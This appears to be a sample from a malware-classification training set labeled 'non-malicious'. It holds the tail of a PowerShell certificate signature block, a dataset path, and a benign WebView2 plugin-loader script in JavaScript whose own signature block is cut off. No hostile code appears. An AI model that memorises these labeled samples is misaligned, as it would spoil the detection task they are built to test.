/* CSqGSIb3DQEBCwUAMGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg */
/* SW5jLjE7MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1 */
/* NiBUaW1lU3RhbXBpbmcgQ0EwHhcNMjMwNzE0MDAwMDAwWhcNMzQxMDEzMjM1OTU5 */
/* WjBIMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xIDAeBgNV */
/* BAMTF0RpZ2lDZXJ0IFRpbWVzdGFtcCAyMDIzMIICIjANBgkqhkiG9w0BAQEFAAOC */
/* Ag8AMIICCgKCAgEAo1NFhx2DjlusPlSzI+DPn9fl0uddoQ4J3C9Io5d6OyqcZ9xi */
/* FVjBqZMRp82qsmrdECmKHmJjadNYnDVxvzqX65RQjxwg6seaOy+WZuNp52n+W8PW */
/* KyAcwZeUtKVQgfLPywemMGjKg0La/H8JJJSkghraarrYO8pd3hkYhftF6g1hbJ3+ */
/* cV7EBpo88MUueQ8bZlLjyNY+X9pD04T10Mf2SC1eRXWWdf7dEKEbg8G45lKVtUfX */
/* eCk5a+B4WZfjRCtK1ZXO7wgX6oJkTf8j48qG7rSkIWRw69XloNpjsy7pBe6q9iT1 */
/* HbybHLK3X9/w7nZ9MZllR1WdSiQvrCuXvp/k/XtzPjLuUjT71Lvr1KAsNJvj3m5k */
/* GQc3AZEPHLVRzapMZoOIaGK7vEEbeBlt5NkP4FhB+9ixLOFRr7StFQYU6mIIE9Np */
/* HnxkTZ0P387RXoyqq1AVybPKvNfEO2hEo6U7Qv1zfe7dCv95NBB+plwKWEwAPoVp */
/* dceDZNZ1zY8SdlalJPrXxGshuugfNJgvOuprAbD3+yqG7HtSOKmYCaFxsmxxrz64 */
/* b5bV4RAT/mFHCoz+8LbH1cfebCTwv0KCyqBxPZySkwS0aXAnDU+3tTbRyV8IpHCj */
/* 7ArxES5k4MsiK8rxKBMhSVF+BmbTO77665E42FEHypS34lCh8zrTioPLQHsCAwEA */
/* AaOCAYswggGHMA4GA1UdDwEB/wQEAwIHgDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB */
/* /wQMMAoGCCsGAQUFBwMIMCAGA1UdIAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwH */
/* ATAfBgNVHSMEGDAWgBS6FtltTYUvcyl2mi91jGogj57IbzAdBgNVHQ4EFgQUpbbv */
/* E+fvzdBkodVWqWUxo97V40kwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDovL2NybDMu */
/* ZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVT */
/* dGFtcGluZ0NBLmNybDCBkAYIKwYBBQUHAQEEgYMwgYAwJAYIKwYBBQUHMAGGGGh0 */
/* dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBYBggrBgEFBQcwAoZMaHR0cDovL2NhY2Vy */
/* dHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRp */
/* bWVTdGFtcGluZ0NBLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAgRrW3qCptZgXvHCN */
/* T4o8aJzYJf/LLOTN6l0ikuyMIgKpuM+AqNnn48XtJoKKcS8Y3U623mzX4WCcK+3t */
/* PUiOuGu6fF29wmE3aEl3o+uQqhLXJ4Xzjh6S2sJAOJ9dyKAuJXglnSoFeoQpmLZX */
/* eY/bJlYrsPOnvTcM2Jh2T1a5UsK2nTipgedtQVyMadG5K8TGe8+c+njikxp2oml1 */
/* 01DkRBK+IA2eqUTQ+OVJdwhaIcW0z5iVGlS6ubzBaRm6zxbygzc0brBBJt3eWpdP */
/* M43UjXd9dUWhpVgmagNF3tlQtVCMr1a9TMXhRsUo063nQwBw3syYnhmJA+rUkTfv */
/* TVLzyWAhxFZH7doRS4wyw4jmWOK22z75X7BC1o/jF5HRqsBV44a/rCcsQdCaM0qo */
/* NtS5cpZ+l3k4SF/Kwtw9Mt911jZnWon49qfH5U81PAC9vpwqbHkB3NpE5jreODsH */
/* XjlY9HxzMVWggBHLFAx+rrz+pOt5Zapo1iLKO+uagjVXKBbLafIymrLS2Dq4sUaG */
/* a7oX/cR3bBVsrquvczroSUa31X/MtjjA2Owc9bahuEMs305MfR5ocMB3CtQC4Fxg */
/* uyj/OOVSWtasFyIjTvTs0xf7UGv/B3cfcZdEQcm4RtNsMnxYL2dHZeUbc7aZ+Wss */
/* BkbvQR7w8F/g29mtkIBEr4AQQYowggauMIIElqADAgECAhAHNje3JFR82Ees/Shm */
/* Kl5bMA0GCSqGSIb3DQEBCwUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdp */
/* Q2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERp */
/* Z2lDZXJ0IFRydXN0ZWQgUm9vdCBHNDAeFw0yMjAzMjMwMDAwMDBaFw0zNzAzMjIy */
/* MzU5NTlaMGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7 */
/* MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1l */
/* U3RhbXBpbmcgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDGhjUG */
/* SbPBPXJJUVXHJQPE8pE3qZdRodbSg9GeTKJtoLDMg/la9hGhRBVCX6SI82j6ffOc */
/* iQt/nR+eDzMfUBMLJnOWbfhXqAJ9/UO0hNoR8XOxs+4rgISKIhjf69o9xBd/qxkr */
/* PkLcZ47qUT3w1lbU5ygt69OxtXXnHwZljZQp09nsad/ZkIdGAHvbREGJ3HxqV3rw */
/* N3mfXazL6IRktFLydkf3YYMZ3V+0VAshaG43IbtArF+y3kp9zvU5EmfvDqVjbOSm */
/* xR3NNg1c1eYbqMFkdECnwHLFuk4fsbVYTXn+149zk6wsOeKlSNbwsDETqVcplicu */
/* 9Yemj052FVUmcJgmf6AaRyBD40NjgHt1biclkJg6OBGz9vae5jtb7IHeIhTZgirH */
/* kr+g3uM+onP65x9abJTyUpURK1h0QCirc0PO30qhHGs4xSnzyqqWc0Jon7ZGs506 */
/* o9UD4L/wojzKQtwYSH8UNM/STKvvmz3+DrhkKvp1KCRB7UK/BZxmSVJQ9FHzNklN */
/* iyDSLFc1eSuo80VgvCONWPfcYd6T/jnA+bIwpUzX6ZhKWD7TA4j+s4/TXkt2ElGT */
/* yYwMO1uKIqjBJgj5FBASA31fI7tk42PgpuE+9sJ0sj8eCXbsq11GdeJgo1gJASgA */
/* DoRU7s7pXcheMBK9Rp6103a50g5rmQzSM7TNsQIDAQABo4IBXTCCAVkwEgYDVR0T */
/* AQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUuhbZbU2FL3MpdpovdYxqII+eyG8wHwYD */
/* VR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMG */
/* A1UdJQQMMAoGCCsGAQUFBwMIMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYY */
/* aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2Fj */
/* ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV */
/* HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRU */
/* cnVzdGVkUm9vdEc0LmNybDAgBgNVHSAEGTAXMAgGBmeBDAEEAjALBglghkgBhv1s */
/* BwEwDQYJKoZIhvcNAQELBQADggIBAH1ZjsCTtm+YqUQiAX5m1tghQuGwGC4QTRPP */
/* MFPOvxj7x1Bd4ksp+3CKDaopafxpwc8dB+k+YMjYC+VcW9dth/qEICU0MWfNthKW */
/* b8RQTGIdDAiCqBa9qVbPFXONASIlzpVpP0d3+3J0FNf/q0+KLHqrhc1DX+1gtqpP */
/* kWaeLJ7giqzl/Yy8ZCaHbJK9nXzQcAp876i8dU+6WvepELJd6f8oVInw1YpxdmXa */
/* zPByoyP6wCeCRK6ZJxurJB4mwbfeKuv2nrF5mYGjVoarCkXJ38SNoOeY+/umnXKv */
/* xMfBwWpx2cYTgAnEtp/Nh4cku0+jSbl3ZpHxcpzpSwJSpzd+k1OsOx0ISQ+UzTl6 */
/* 3f8lY5knLD0/a6fxZsNBzU+2QJshIUDQtxMkzdwdeDrknq3lNHGS1yZr5Dhzq6YB */
/* T70/O3itTK37xJV77QpfMzmHQXh6OOmc4d0j/R0o08f56PGYX/sr2H7yRp11LB4n */
/* LCbbbxV7HhmLNriT1ObyF5lZynDwN7+YAN8gFk8n+2BnFqFmut1VwDophrCYoCvt */
/* lUG3OtUVmDG0YgkPCr2B2RP+v6TR81fZvAT6gt4y3wSJ8ADNXcL50CN/AAvkdgIm */
/* 2fBldkKmKYcJRyvmfxqkhQ/8mJb2VVQrH4D6wPIOK+XW+6kvRBVK5xMOHds3OBqh */
/* K/bt1nz8MIIFjTCCBHWgAwIBAgIQDpsYjvnQLefv21DiCEAYWjANBgkqhkiG9w0B */
/* AQwFADBlMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYD */
/* VQQLExB3d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVk */
/* IElEIFJvb3QgQ0EwHhcNMjIwODAxMDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQsw */
/* CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu */
/* ZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQw */
/* ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz */
/* 7MKnJS7JIT3yithZwuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS */
/* 5F/WBTxSD1Ifxp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7 */
/* bXHiLQwb7iDVySAdYyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfI */
/* SKhmV1efVFiODCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jH */
/* trHEtWoYOAMQjdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14 */
/* Ztk6MUSaM0C/CNdaSaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2 */
/* h4mXaXpI8OCiEhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt */
/* 6zPZxd9LBADMfRyVw4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPR */
/* iQfhvbfmQ6QYuKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ER */
/* ElvlEFDrMcXKchYiCd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4K */
/* Jpn15GkvmB0t9dmpsh3lGwIDAQABo4IBOjCCATYwDwYDVR0TAQH/BAUwAwEB/zAd */
/* BgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08wHwYDVR0jBBgwFoAUReuir/SS */
/* y4IxLVGLp6chnfNtyA8wDgYDVR0PAQH/BAQDAgGGMHkGCCsGAQUFBwEBBG0wazAk */
/* BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEMGCCsGAQUFBzAC */
/* hjdodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURS */
/* b290Q0EuY3J0MEUGA1UdHwQ+MDwwOqA4oDaGNGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0 */
/* LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwEQYDVR0gBAowCDAGBgRV */
/* HSAAMA0GCSqGSIb3DQEBDAUAA4IBAQBwoL9DXFXnOF+go3QbPbYW1/e/Vwe9mqyh */
/* hyzshV6pGrsi+IcaaVQi7aSId229GhT0E0p6Ly23OO/0/4C5+KH38nLeJLxSA8hO */
/* 0Cre+i1Wz/n096wwepqLsl7Uz9FDRJtDIeuWcqFItJnLnU+nBgMTdydE1Od/6Fmo */
/* 8L8vC6bp8jQ87PcDx4eo0kxAGTVGamlUsLihVo7spNU96LHc/RzY9HdaXFSMb++h */
/* UD38dglohJ9vytsgjTVgHAIDyyCwrFigDkBjxZgiwbJZ9VVrzyerbHbObyMt9H5x */
/* aiNrIv8SuFQtJ37YOtnwtoeW/VvRXKwYw02fc7cBqZ9Xql4o4rmUMYIDdjCCA3IC */
/* AQEwdzBjMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5 */
/* BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0 */
/* YW1waW5nIENBAhAFRK/zlJ0IOaa/2z9f5WEWMA0GCWCGSAFlAwQCAQUAoIHRMBoG */
/* CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAcBgkqhkiG9w0BCQUxDxcNMjQwOTIw */
/* MDcwMDI1WjArBgsqhkiG9w0BCRACDDEcMBowGDAWBBRm8CsywsLJD4JdzqqKycZP */
/* GZzPQDAvBgkqhkiG9w0BCQQxIgQgcEmbh3EVvKDV+FXvjm++F3RClwEcUhL9gJ3m */
/* oGI32n0wNwYLKoZIhvcNAQkQAi8xKDAmMCQwIgQg0vbkbe10IszR1EBXaEE2b4KK */
/* 2lWarjMWr00amtQMeCgwDQYJKoZIhvcNAQEBBQAEggIAiDrhvEq19keaqCMc2QTc */
/* 4jSeO5U1x8VqsGtw3fE6SPKJ1xrK5VHiKPI9yKSYUuBD95LgbPHAUWDaKWNbAuCi */
/* ACAX2p9qe2tfFs9Ls9yrbIMV7DMiSufUaan4urEXnJLwtbVsWiiTWapGKLHH0z2p */
/* 5lCzqhIxYJ+hTsnBdtfd4qTt6kzMrG5s3vbpch7rogqVJ1+CCXRcdxeq0NhY0RkP */
/* D1x4soJ8QykD/4VtlAilNvizKsIsLnyWktlaWJ2SV/sPwczAZit98UvW4jBkiqjT */
/* czQjDgl/d4vSYRcRJZk36RAHi1lTccYsPCa23lqYjJ52Hye1P1J0cPLLVtHWJIKk */
/* sBPYubB+OsKYWQAvPi8igU/w5GuIQWNKO7p6wi6a1IpBKNy/woDm+TGizEfI6ygW */
/* 8oHh2CzPVWja7qHoXCu4Z60WJsx7pv1yqy9AzzvVOiSPXze4u22NIZmMmCoAaNeV */
/* ZXZsAwkKqt8lh06Oayo+RJTZFxUTeDH4o6v1Y4cZ2Mh3XOjWIpJ3e+ecT9LpI481 */
/* ickVAEWJ8a5mC5f9FgGgMLYLI4HvaXAUq0fYbbkXe+tLChLBvs5tWMqAJpgwIdpn */
/* rNQRIuv62TakpXMuxZxlXvzU1VNb6gLDWn9Ez6XB5/Q6Zgzx5soNJlLw+W/7wnYL */
/* bwZHbymf/1+cOjHkG4KPeDE= */
/* SIG # End signature block */
|
combined_dataset/train/non-malicious/sample_24_31.ps1
|
sample_24_31.ps1
|
let pluginUrl = window.chrome.webview.hostObjects.sync.external.GetPluginUrl();
let scripts = [pluginUrl, "Scripts/common.eventHandlers.js", "Scripts/aspire.eventHandlers.js"];
let currentScriptElement = document.querySelector("script[src='Scripts/aspire.plugin.js']");
if (currentScriptElement !== null) {
scripts.forEach(element => {
let newScriptElement = document.createElement("script");
newScriptElement.setAttribute("src", element);
newScriptElement.setAttribute("type", "text/javascript");
newScriptElement.async = false;
currentScriptElement.parentNode.insertBefore(newScriptElement, currentScriptElement.nextSibling);
currentScriptElement = newScriptElement;
});
}
// SIG // Begin signature block
// SIG // MIInvQYJKoZIhvcNAQcCoIInrjCCJ6oCAQExDzANBglg
// SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor
// SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC
// SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg
// SIG // UxB0+L8e5mCO3kWXMDVZYdvMUiDr+vyn6eq4Ov+KTVKg
// SIG // gg12MIIF9DCCA9ygAwIBAgITMwAAA68wQA5Mo00FQQAA
// SIG // AAADrzANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV
// SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
// SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
// SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT
// SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDkwMFoX
// SIG // DTI0MTExNDE5MDkwMFowdDELMAkGA1UEBhMCVVMxEzAR
// SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
// SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
// SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
// SIG // zkvLNa2un9GBrYNDoRGkGv7d0PqtTBB4ViYakFbjuWpm
// SIG // F0KcvDAzzaCWJPhVgIXjz+S8cHEoHuWnp/n+UOljT3eh
// SIG // A8Rs6Lb1aTYub3tB/e0txewv2sQ3yscjYdtTBtFvEm9L
// SIG // 8Yv76K3Cxzi/Yvrdg+sr7w8y5RHn1Am0Ff8xggY1xpWC
// SIG // XFI+kQM18njQDcUqSlwBnexYfqHBhzz6YXA/S0EziYBu
// SIG // 2O2mM7R6gSyYkEOHgIGTVOGnOvvC5xBgC4KNcnQuQSRL
// SIG // iUI2CmzU8vefR6ykruyzt1rNMPI8OqWHQtSDKXU5JNqb
// SIG // k4GNjwzcwbSzOHrxuxWHq91l/vLdVDGDUwIDAQABo4IB
// SIG // czCCAW8wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB
// SIG // BQUHAwMwHQYDVR0OBBYEFEcccTTyBDxkjvJKs/m4AgEF
// SIG // hl7BMEUGA1UdEQQ+MDykOjA4MR4wHAYDVQQLExVNaWNy
// SIG // b3NvZnQgQ29ycG9yYXRpb24xFjAUBgNVBAUTDTIzMDAx
// SIG // Mis1MDE4MjYwHwYDVR0jBBgwFoAUSG5k5VAF04KqFzc3
// SIG // IrVtqMp1ApUwVAYDVR0fBE0wSzBJoEegRYZDaHR0cDov
// SIG // L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWlj
// SIG // Q29kU2lnUENBMjAxMV8yMDExLTA3LTA4LmNybDBhBggr
// SIG // BgEFBQcBAQRVMFMwUQYIKwYBBQUHMAKGRWh0dHA6Ly93
// SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj
// SIG // Q29kU2lnUENBMjAxMV8yMDExLTA3LTA4LmNydDAMBgNV
// SIG // HRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4ICAQCEsRbf
// SIG // 80dn60xTweOWHZoWaQdpzSaDqIvqpYHE5ZzuEMJWDdcP
// SIG // 72MGw8v6BSaJQ+a+hTCXdERnIBDPKvU4ENjgu4EBJocH
// SIG // lSe8riiZUAR+z+z4OUYqoFd3EqJyfjjOJBR2z94Dy4ss
// SIG // 7LEkHUbj2NZiFqBoPYu2OGQvEk+1oaUsnNKZ7Nl7FHtV
// SIG // 7CI2lHBru83e4IPe3glIi0XVZJT5qV6Gx/QhAFmpEVBj
// SIG // SAmDdgII4UUwuI9yiX6jJFNOEek6MoeP06LMJtbqA3Bq
// SIG // +ZWmJ033F97uVpyaiS4bj3vFI/ZBgDnMqNDtZjcA2vi4
// SIG // RRMweggd9vsHyTLpn6+nXoLy03vMeebq0C3k44pgUIEu
// SIG // PQUlJIRTe6IrN3GcjaZ6zHGuQGWgu6SyO9r7qkrEpS2p
// SIG // RjnGZjx2RmCamdAWnDdu+DmfNEPAddYjaJJ7PTnd+PGz
// SIG // G+WeH4ocWgVnm5fJFhItjj70CJjgHqt57e1FiQcyWCwB
// SIG // hKX2rGgN2UICHBF3Q/rsKOspjMw2OlGphTn2KmFl5J7c
// SIG // Qxru54A9roClLnHGCiSUYos/iwFHI/dAVXEh0S0KKfTf
// SIG // M6AC6/9bCbsD61QLcRzRIElvgCgaiMWFjOBL99pemoEl
// SIG // AHsyzG6uX93fMfas09N9YzA0/rFAKAsNDOcFbQlEHKiD
// SIG // T7mI20tVoCcmSIhJATCCB3owggVioAMCAQICCmEOkNIA
// SIG // AAAAAAMwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYT
// SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
// SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
// SIG // cG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290
// SIG // IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDExMB4XDTEx
// SIG // MDcwODIwNTkwOVoXDTI2MDcwODIxMDkwOVowfjELMAkG
// SIG // A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO
// SIG // BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
// SIG // dCBDb3Jwb3JhdGlvbjEoMCYGA1UEAxMfTWljcm9zb2Z0
// SIG // IENvZGUgU2lnbmluZyBQQ0EgMjAxMTCCAiIwDQYJKoZI
// SIG // hvcNAQEBBQADggIPADCCAgoCggIBAKvw+nIQHC6t2G6q
// SIG // ghBNNLrytlghn0IbKmvpWlCquAY4GgRJun/DDB7dN2vG
// SIG // EtgL8DjCmQawyDnVARQxQtOJDXlkh36UYCRsr55JnOlo
// SIG // XtLfm1OyCizDr9mpK656Ca/XllnKYBoF6WZ26DJSJhIv
// SIG // 56sIUM+zRLdd2MQuA3WraPPLbfM6XKEW9Ea64DhkrG5k
// SIG // NXimoGMPLdNAk/jj3gcN1Vx5pUkp5w2+oBN3vpQ97/vj
// SIG // K1oQH01WKKJ6cuASOrdJXtjt7UORg9l7snuGG9k+sYxd
// SIG // 6IlPhBryoS9Z5JA7La4zWMW3Pv4y07MDPbGyr5I4ftKd
// SIG // gCz1TlaRITUlwzluZH9TupwPrRkjhMv0ugOGjfdf8NBS
// SIG // v4yUh7zAIXQlXxgotswnKDglmDlKNs98sZKuHCOnqWbs
// SIG // YR9q4ShJnV+I4iVd0yFLPlLEtVc/JAPw0XpbL9Uj43Bd
// SIG // D1FGd7P4AOG8rAKCX9vAFbO9G9RVS+c5oQ/pI0m8GLhE
// SIG // fEXkwcNyeuBy5yTfv0aZxe/CHFfbg43sTUkwp6uO3+xb
// SIG // n6/83bBm4sGXgXvt1u1L50kppxMopqd9Z4DmimJ4X7Iv
// SIG // hNdXnFy/dygo8e1twyiPLI9AN0/B4YVEicQJTMXUpUMv
// SIG // dJX3bvh4IFgsE11glZo+TzOE2rCIF96eTvSWsLxGoGyY
// SIG // 0uDWiIwLAgMBAAGjggHtMIIB6TAQBgkrBgEEAYI3FQEE
// SIG // AwIBADAdBgNVHQ4EFgQUSG5k5VAF04KqFzc3IrVtqMp1
// SIG // ApUwGQYJKwYBBAGCNxQCBAweCgBTAHUAYgBDAEEwCwYD
// SIG // VR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0j
// SIG // BBgwFoAUci06AjGQQ7kUBU7h6qfHMdEjiTQwWgYDVR0f
// SIG // BFMwUTBPoE2gS4ZJaHR0cDovL2NybC5taWNyb3NvZnQu
// SIG // Y29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0
// SIG // MjAxMV8yMDExXzAzXzIyLmNybDBeBggrBgEFBQcBAQRS
// SIG // MFAwTgYIKwYBBQUHMAKGQmh0dHA6Ly93d3cubWljcm9z
// SIG // b2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0MjAx
// SIG // MV8yMDExXzAzXzIyLmNydDCBnwYDVR0gBIGXMIGUMIGR
// SIG // BgkrBgEEAYI3LgMwgYMwPwYIKwYBBQUHAgEWM2h0dHA6
// SIG // Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvZG9jcy9w
// SIG // cmltYXJ5Y3BzLmh0bTBABggrBgEFBQcCAjA0HjIgHQBM
// SIG // AGUAZwBhAGwAXwBwAG8AbABpAGMAeQBfAHMAdABhAHQA
// SIG // ZQBtAGUAbgB0AC4gHTANBgkqhkiG9w0BAQsFAAOCAgEA
// SIG // Z/KGpZjgVHkaLtPYdGcimwuWEeFjkplCln3SeQyQwWVf
// SIG // Liw++MNy0W2D/r4/6ArKO79HqaPzadtjvyI1pZddZYSQ
// SIG // fYtGUFXYDJJ80hpLHPM8QotS0LD9a+M+By4pm+Y9G6XU
// SIG // tR13lDni6WTJRD14eiPzE32mkHSDjfTLJgJGKsKKELuk
// SIG // qQUMm+1o+mgulaAqPyprWEljHwlpblqYluSD9MCP80Yr
// SIG // 3vw70L01724lruWvJ+3Q3fMOr5kol5hNDj0L8giJ1h/D
// SIG // Mhji8MUtzluetEk5CsYKwsatruWy2dsViFFFWDgycSca
// SIG // f7H0J/jeLDogaZiyWYlobm+nt3TDQAUGpgEqKD6CPxNN
// SIG // ZgvAs0314Y9/HG8VfUWnduVAKmWjw11SYobDHWM2l4bf
// SIG // 2vP48hahmifhzaWX0O5dY0HjWwechz4GdwbRBrF1HxS+
// SIG // YWG18NzGGwS+30HHDiju3mUv7Jf2oVyW2ADWoUa9WfOX
// SIG // pQlLSBCZgB/QACnFsZulP0V3HjXG0qKin3p6IvpIlR+r
// SIG // +0cjgPWe+L9rt0uX4ut1eBrs6jeZeRhL/9azI2h15q/6
// SIG // /IvrC4DqaTuv/DDtBEyO3991bWORPdGdVk5Pv4BXIqF4
// SIG // ETIheu9BCrE/+6jMpF3BoYibV3FWTkhFwELJm3ZbCoBI
// SIG // a/15n8G9bW1qyVJzEw16UM0xghmfMIIZmwIBATCBlTB+
// SIG // MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv
// SIG // bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj
// SIG // cm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNy
// SIG // b3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExAhMzAAAD
// SIG // rzBADkyjTQVBAAAAAAOvMA0GCWCGSAFlAwQCAQUAoIGu
// SIG // MBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG
// SIG // AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3
// SIG // DQEJBDEiBCCgSZ0QxzPX610jQf8z2jZZzRsNUMdZZ5cM
// SIG // Ew9FRhQ31TBCBgorBgEEAYI3AgEMMTQwMqAUgBIATQBp
// SIG // AGMAcgBvAHMAbwBmAHShGoAYaHR0cDovL3d3dy5taWNy
// SIG // b3NvZnQuY29tMA0GCSqGSIb3DQEBAQUABIIBAC8Ot1Gu
// SIG // L0nqNOtKn1vCMWyHq+KFz84Xcnzk4btvoxqd0X6HeAOT
// SIG // PwyXrk84k6SmX/VWAJV675mCZm2vX4sMn+RXqVGdQy5Q
// SIG // anYuMPSbPpNRk+Gk3MPlpmohaqIKcwE7KN1VK3Ggu7/7
// SIG // OZtl4KQw+W7SahQmtRs56IHSIPPAhQBruwR/99vWcfvk
// SIG // dFHfVpTJBr6RRsTF7j8U8dn2VNN9eBXiSAiilJ1WpTbt
// SIG // YizdYIHGLCc6LsOph2AnUo5bgvQnmryo9RuaIgC+SgRz
// SIG // HCxQb01U7EPLjMZaneBmsU9rDlCSyVIG9QpZtlleyvcA
// SIG // ofolhkcKkNflylKBhFci+FpvcNyhghcpMIIXJQYKKwYB
// SIG // BAGCNwMDATGCFxUwghcRBgkqhkiG9w0BBwKgghcCMIIW
// SIG // /gIBAzEPMA0GCWCGSAFlAwQCAQUAMIIBWQYLKoZIhvcN
// SIG // AQkQAQSgggFIBIIBRDCCAUACAQEGCisGAQQBhFkKAwEw
// SIG // MTANBglghkgBZQMEAgEFAAQgGEdr48ms6hYBpPL2hi1l
// SIG // ulCQqmW5aPAZSFySFN0CsKUCBmXV/YeCMBgTMjAyNDAz
// SIG // MDQxNzA2MTkuMDg4WjAEgAIB9KCB2KSB1TCB0jELMAkG
// SIG // A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO
// SIG // BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
// SIG // dCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0
// SIG // IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYD
// SIG // VQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRCODAtNjlD
